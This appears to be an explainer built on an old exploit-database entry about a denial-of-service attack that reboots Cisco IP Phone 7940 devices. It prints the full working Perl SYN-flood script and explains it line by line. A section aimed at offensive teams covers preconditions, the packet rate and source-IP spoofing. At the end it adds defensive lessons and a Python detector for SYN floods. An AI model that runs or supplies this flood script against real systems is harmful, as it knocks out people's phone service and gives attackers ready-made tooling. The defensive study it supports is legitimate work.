Cisco IP Phone 7940 Reboot Exploit Explained

What this paper is
This paper describes a Denial of Service (DoS) vulnerability in Cisco IP Phone 7940 devices. The exploit causes the phone to reboot by sending a sequence of TCP SYN packets to it. It targets phones running firmware version 7.0(2.0) with the Skinny (SCCP) call-control protocol; the author notes it does not apply to the SIP firmware.
Simple technical breakdown
The exploit works by sending a large number of TCP SYN packets to the phone's web interface (port 80). The packets themselves are ordinary SYNs (sequence and acknowledgement numbers set to zero, a fresh random source port for each packet); it is the volume and rate of these connection attempts that overwhelm the phone's network stack or the service handling the connections. The excessive load causes the phone's operating system or firmware to crash and reboot.
The script uses Perl to construct and send these packets. It allows customization of the source IP address, destination IP address, target port, the number of packets to send, and the delay between each packet.
Complete code and payload walkthrough
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]

Code Fragment/Block -> Practical Purpose
- #!/usr/bin/perl: Shebang line, indicating the script should be executed with the Perl interpreter.
- # Comments: These lines provide context about the exploit's purpose, author, target, and specific conditions for successful exploitation (e.g., firmware version 7.0(2.0), Skinny protocol, port 80).
- use Net::RawIP;: Imports the Net::RawIP module, which is essential for crafting and sending raw IP packets at a low level. This allows for precise control over packet headers.
- use Time::HiRes;: Imports the Time::HiRes module, which provides high-resolution time functions, used here for precise sleep operations between packet sends.
- $pkt = new Net::RawIP;: Initializes a new Net::RawIP object. This object is used to build and send the network packets.
- die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);: This is an argument validation check. $0 is the name of the script itself; $ARGV is the array of command-line arguments passed to the script; unless ($ARGV[4]) checks whether the 5th argument (index 4) is provided. If it is not, the script prints the usage message and exits, so all five arguments (src, dst, target port, number of pkts, packet delay) are required.
- $pkt->set({ ... });: This block configures the network packet's headers.
- ip => { saddr => $ARGV[0], daddr => $ARGV[1] }: Sets the IP layer headers. saddr => $ARGV[0] sets the source IP address to the first command-line argument; daddr => $ARGV[1] sets the destination IP address to the second command-line argument.
- tcp => { dest => $ARGV[2], syn => 1, seq => 0, ack => 0 }: Sets the TCP layer headers. dest => $ARGV[2] sets the destination TCP port to the third command-line argument; syn => 1 sets the SYN flag, marking the packet as the start of a TCP connection attempt; seq => 0 sets the TCP sequence number to 0; ack => 0 sets the TCP acknowledgment number to 0.
- for(1..$ARGV[3]){ ... };: This loop iterates a specified number of times, controlled by the fourth command-line argument ($ARGV[3]).
- $pkt->set({tcp=>{source=>int(rand(65535))}});: Inside the loop, this line modifies the TCP header for each packet. source=>int(rand(65535)) sets the source TCP port to a random integer between 0 and 65535 (rand(65535) is strictly less than its argument, so 65535 itself is never produced, while port 0 can be). Randomising the source port is a common technique in DoS attacks to make filtering on source port harder and to potentially consume more resources on the target.
- Time::HiRes::sleep($ARGV[4]);: Pauses execution for a duration specified by the fifth command-line argument ($ARGV[4]). This controls the rate at which packets are sent.
- $pkt->send;: Sends the constructed raw IP packet over the network.
- # milw0rm.com [2006-01-10]: A comment indicating the source and publication date of the exploit.
Payload/Shellcode Explanation:
There is no explicit shellcode or payload bytes in this script. The "payload" is the crafted sequence of TCP SYN packets themselves, designed to trigger the vulnerability in the target device's network stack. The exploit relies on sending a high volume of these specific packets to cause a condition that leads to a reboot.
Practical details for offensive operations teams
- Required Access Level: Network access to the target IP phone's subnet is required. No prior authentication or user-level access to the phone is needed.
- Lab Preconditions:
- A Cisco IP Phone 7940 running firmware version 7.0(2.0) or a demonstrably vulnerable version using the Skinny protocol.
- Network connectivity between the attacker machine and the target phone.
- A Kali Linux or similar Linux distribution with Perl and the Net::RawIP module installed (cpan Net::RawIP).
- Tooling Assumptions:
- Perl interpreter.
- Net::RawIP Perl module.
- Time::HiRes Perl module (usually included with Perl).
- A network interface capable of sending raw packets.
- Execution Pitfalls:
- Firmware Version: The exploit is highly specific to the firmware version mentioned. Newer versions or SIP firmware will likely not be affected.
- Network Segmentation/Firewalls: Firewalls or Intrusion Detection/Prevention Systems (IDS/IPS) between the attacker and the target could detect and block the flood of SYN packets.
- Packet Rate: The packet delay is crucial. Too fast a rate might be blocked; too slow might not overwhelm the device. The suggested 0.002 seconds is a starting point.
- Source IP Spoofing: While the script uses the provided source IP, in a real-world scenario, spoofing the source IP might be considered to obscure the origin, but this can complicate receiving any potential (though unlikely in a DoS) ICMP responses.
- Target Port: The exploit targets port 80, which is typically the HTTP management interface. If this port is blocked or not used for management, the exploit will fail.
- Resource Exhaustion: The script sends raw packets. If the attacker's machine is not powerful enough or the network link is saturated, the packet sending might be unreliable.
- Planning Assumptions:
- The target device is reachable on the network.
- The target device is running the vulnerable firmware and protocol.
- The management interface (port 80) is accessible.
- The objective is to disrupt service (reboot the phone).
Where this was used and when
This exploit was published in January 2006. At that time, Cisco IP Phones were common in enterprise environments. Vulnerabilities like this were often discovered and exploited by security researchers and, unfortunately, by malicious actors to disrupt business communications. The specific mention of "milw0rm.com" indicates it was shared on a public exploit database, suggesting it was likely tested and potentially used in unauthorized activities shortly after its discovery.
Defensive lessons for modern teams
- Firmware Management: Regularly update firmware on all network devices, including IP phones, to patch known vulnerabilities. Vendor advisories should be closely monitored.
- Network Segmentation: Isolate critical devices like IP phones on separate network segments to limit the blast radius of any potential exploit.
- Firewall Rules: Implement strict firewall rules to only allow necessary traffic to and from IP phones. Block unnecessary ports and protocols.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and configure IDS/IPS to detect and potentially block patterns of suspicious network traffic, such as SYN floods or malformed packets targeting known vulnerable services.
- Protocol Awareness: Understand the protocols used by devices (e.g., Skinny vs. SIP for Cisco phones) and their associated vulnerabilities.
- Least Privilege: Ensure management interfaces are secured and accessible only from authorized management networks.
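As an added illustration of the IDS/IPS lesson above (my example, not code from the original paper or from any vendor tooling), the following Python detector flags the traffic shape the script produces: a burst of bare SYNs toward one destination port, a different random source port on each packet, and a sequence number that is always zero. The record layout, the sample traffic and the thresholds are constructed assumptions, not a real flow-export format.

```python
# Added example, not part of the original paper: a sliding-window SYN-flood
# detector run over constructed, NetFlow-style per-packet records.
from collections import defaultdict, deque
import random

def make_sample_records():
    """Constructed test traffic: 5 ordinary SYNs, then a 1000-packet burst."""
    rng = random.Random(7)  # fixed seed so the sample is reproducible
    recs = []
    for i in range(5):  # normal connection attempts carry a randomised ISN
        recs.append((float(i), "10.0.0.5", 40000 + i, "10.0.0.50", 80,
                     "S", rng.randrange(1, 2**32)))
    for i in range(1000):  # flood: 2 ms apart, seq 0, random sport like rand(65535)
        recs.append((10.0 + i * 0.002, "10.0.0.9", rng.randrange(65535),
                     "10.0.0.50", 80, "S", 0))
    return recs

def detect_syn_flood(records, window=1.0, threshold=100):
    """Return one alert per (dst, dport) that receives >= threshold bare SYNs
    within `window` seconds. Records are (ts, src, sport, dst, dport, flags, seq)
    tuples sorted by ts; flags "S" means SYN set and ACK clear."""
    recent = defaultdict(deque)   # (dst, dport) -> deque of (ts, sport, seq)
    alerted = set()
    alerts = []
    for ts, src, sport, dst, dport, flags, seq in records:
        if flags != "S":
            continue
        key = (dst, dport)
        q = recent[key]
        q.append((ts, sport, seq))
        while q and ts - q[0][0] > window:   # drop packets that left the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "target": f"{dst}:{dport}",
                "first_seen": q[0][0],
                "syn_count": len(q),
                "distinct_sports": len({p for _, p, _ in q}),
                # a real TCP stack randomises the ISN; all-zero is a tool fingerprint
                "all_seq_zero": all(s == 0 for _, _, s in q),
            })
    return alerts

if __name__ == "__main__":
    for alert in detect_syn_flood(make_sample_records()):
        print(alert)
```

With the sample traffic the five normal SYNs never trip the threshold, while the burst is reported once, 100 packets in, with every sequence number zero and almost every source port distinct.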
ASCII visual (if applicable)
This exploit is a direct network-to-device interaction. An ASCII visual can represent the packet flow.
+-----------------+       +-----------------+       +-------------------+
| Attacker Machine| ----> | Network Switch  | ----> | Cisco IP Phone    |
| (Perl Script)   |       |                 |       | (7940, v7.0(2.0)) |
+-----------------+       +-----------------+       +-------------------+
        |                                                     |
        | Sends crafted TCP SYN packets                       | Receives packets
        | (high volume, specific rate)                        | Overwhelms/crashes
        |                                                     | Reboots
        +-----------------------------------------------------+

Source references
- Paper ID: 1411
- Paper Title: Cisco IP Phone 7940 - Reboot (Denial of Service)
- Author: kokanin
- Published: 2006-01-10
- Keywords: Hardware,dos
- Paper URL: https://www.exploit-db.com/papers/1411
- Raw URL: https://www.exploit-db.com/raw/1411